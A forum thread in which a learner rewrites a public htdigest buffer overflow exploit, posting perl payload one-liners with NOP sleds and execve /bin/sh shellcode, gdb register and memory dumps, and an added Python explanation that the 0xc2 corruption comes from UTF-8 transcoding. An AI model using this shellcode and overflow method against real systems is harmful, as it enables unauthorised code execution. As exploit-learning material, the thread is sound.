First exploit coding stack corruption

This is a discussion on "First exploit coding stack corruption" within the Hacking part of the Computer Security: Discussions section.
Hi All, my stack's going a bit weird. I'm re-writing the htdigest exploit (http://seclists.org/lists/bugtraq/2005/May/0154.html) as a practice. Anyway I do this

```
[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x41"x286 .. "\xe9\xfb\xff\xbf" . "\x90"x30 . "x31\xdb\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'` user
```

I get the following stack output

```
ecx            0x8050d28    134548776
edx            0x22d9       8921
ebx            0x41414141   1094795585
esp            0xbfffee50   0xbfffee50
ebp            0x41414141   0x41414141
esi            0x41414141   1094795585
edi            0x41414141   1094795585
eip            0x41414141   0x41414141
eflags         0x10286      66182
cs             0x23         35
ss             0x2b         43
ds             0xc010002b   -1072693205
es             0x2b         43
```

Before, on exactly the same buffer but without shellcode, I had control of EIP, but when I added the shellcode I suddenly end up having EIP full of AAAA's. Perhaps I jumped to the wrong address, but in the address I jumped to I have a nopsled and all these 0xc2's, which I don't think should be there. Any ideas?

```
(gdb) x/bx 0xbffffbe9
0xbffffbe9: 0xc2
(gdb)
0xbffffbea: 0x90
(gdb)
0xbffffbeb: 0xc2
(gdb)
0xbffffbec: 0x90
(gdb)
0xbffffbed: 0xc2
```
Dropped the \x41 for a nopsled to fill the buffer, but the nopsled seems to corrupt, or at least it isn't a nopsled anymore. But I know my problem, and now I'm hitting the nopsled. I am with the program now and know what we are looking for in the structure. But the nopsled is corrupt, or at least it isn't a nopsled anymore.

maximumbuffer(NOP's) - strlen(shellcode) - 4, structure [nopsssssssssssss][shellcode][retaddr]

```
[root@localhost bin]# ./htdigest ./hohi `perl -e 'print "\x90"x269 .. "\x31\xc0\xb0\x46\x31\xc9\xcd\x80\x80\xeb\x16\5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x41\x41\x41\x42\x42\x42\x42" . "\xc0\xfb\xff\xbf\x45"'` user
```

New info reg:

```
ebx            0x90c290c2   -1866297150
esp            0xbfffdbf0   0xbfffdbf0
ebp            0x90c290c2   0x90c290c2
esi            0x90c290c2   -1866297150
edi            0x90c290c2   -1866297150
eip            0x90c290c2   0x90c290c2
```

This is no nopsled, but we are in the right place, I think.

```
(gdb) x/bx 0xbffffbc0
0xbffffbc0: 0xc2
(gdb)
0xbffffbc1: 0x90
(gdb)
0xbffffbc2: 0xc2
(gdb)
0xbffffbc3: 0x90
(gdb)
0xbffffbc4: 0xc2
```

I tried again to find it using objdump but no luck:

```
[root@localhost bin]# objdump -s core.1888 | grep "90909090"
```

Where's my nopsled??
EDIT: definitely very weird. I don't really know what the problem is. What I do know is that when you use \x90 it's putting 2 bytes on the stack; when you use \x90 instead of \x41 you have to have twice as many \x41 as when you use \x90.

```
htdigest ./pikah `perl -e 'print "\x90"x163'` user
Adding user ������������������������������������ in realm ��������������������������������������������������������������������������������������������������������������������������������������������������������������������
New password:
Re-type new password:
Segmentation fault (core dumped)
```

```
htdigest ./pikah `perl -e 'print "\x41"x163'` user
Adding user user in realm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New password:
Re-type new password:
(no core dump)
```
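One cause consistent with everything quoted in this thread (each \x90 arriving as the pair 0xc2 0x90, \x41 arriving unchanged, a buffer of 163 high bytes occupying twice the space, and registers loading 0x90c290c2) is that the payload bytes were UTF-8 transcoded somewhere between Perl and the program's buffer; where that happens is an assumption, the thread does not establish it. The Python below is an added example, not code from the thread or the original exploit: it reproduces the expansion and checks a debugger dump against the bytes that were meant to be in the buffer, so a mismatch like this can be attributed before chasing it elsewhere.

```python
# Added example (not from the thread): why a buffer of \x90 bytes can show up
# in memory as 0xc2 0x90 pairs while a buffer of \x41 does not.
# UTF-8 leaves bytes below 0x80 alone; bytes 0x80..0xFF each become a
# two-byte sequence, so the payload grows by one byte per high byte.

def utf8_expand(raw: bytes) -> bytes:
    """What a byte string becomes if it is treated as Latin-1 text and
    re-encoded as UTF-8 (a silent transcoding step in some tool chains)."""
    return raw.decode("latin-1").encode("utf-8")

def expansion_report(raw: bytes) -> dict:
    """Length before and after transcoding, and how many bytes are affected."""
    high = sum(1 for b in raw if b >= 0x80)
    return {"intended_len": len(raw), "high_bytes": high,
            "expanded_len": len(raw) + high}

def diagnose(intended: bytes, observed: bytes) -> str:
    """Compare the bytes placed in a buffer with what the debugger shows at
    that address; 'observed' may be just a prefix of the full buffer."""
    if intended.startswith(observed):
        return "match"
    if utf8_expand(intended).startswith(observed):
        return "utf8-expanded"
    return "unexplained"

def first_dword_le(data: bytes) -> int:
    """Little-endian value of the first four bytes, as a register loads them."""
    return int.from_bytes(data[:4], "little")

if __name__ == "__main__":
    # Constructed inputs: the 30-byte NOP sled from the first post and the
    # five bytes gdb printed at the sled address (0xc2 0x90 0xc2 0x90 0xc2).
    sled = b"\x90" * 30
    seen_in_gdb = bytes([0xC2, 0x90, 0xC2, 0x90, 0xC2])
    print(diagnose(sled, seen_in_gdb))              # utf8-expanded
    print(expansion_report(b"\x41" * 163))          # expanded_len 163
    print(expansion_report(b"\x90" * 163))          # expanded_len 326
    print(hex(first_dword_le(utf8_expand(sled))))   # 0x90c290c2
```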